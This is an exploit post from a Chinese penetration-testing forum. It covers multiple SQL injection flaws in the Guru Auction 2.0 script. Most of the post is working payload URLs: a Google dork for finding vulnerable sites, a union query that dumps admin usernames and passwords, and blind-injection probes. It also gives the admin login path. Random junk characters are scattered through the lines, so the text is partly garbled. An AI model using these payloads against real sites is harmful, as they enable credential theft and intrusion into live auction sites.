中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]
作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities  y3 f. D" f" }
, C) N! {  l8 _+ _  h
作者     : v3n0m
% I% u- G% \6 I- l7 O1 P应用 : Guru Auction 2.07 W! @  Y7 s9 m  l# F# l3 r2 c6 ~
Price       : $49
4 V, _7 B0 ]3 B5 e$ eVendor      : http://www.guruscript.com/7 @; v* s! B. P! i
Google Dork : inurl:subcat.php?cate_id=
8 a+ e+ I) O: y7 @+ m/ C
4 S" B) ]# p5 vSQLi p0c:
* m; w( J. M4 x+ ?8 E0 b# i~~~~~~~~~~
8 B, B9 ^* j- I7 M! J3 q% Phttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
9 e( D; }- \: z) C* T: T0 E  X * c3 h* J8 T0 B4 c2 L
  b5 y$ P* H4 W$ D6 v
盲注 p0c:, E9 |: R3 z2 h: a$ r
~~~~~~~~~~) k5 n! z9 m7 Q) L* ~7 {/ g
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
$ z' Z6 P, x- p! Dhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
& D4 s" ^; J4 E( P3 U$ t
* ^" `7 v9 ~) a管理登录入口:
3 r- ]  I4 C  B9 A: ]~~~~~~~~~~+ U7 S8 z; G0 J% C# T3 i
http://domain.tld/[path]/admin/
( m" Y% e8 B. E



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2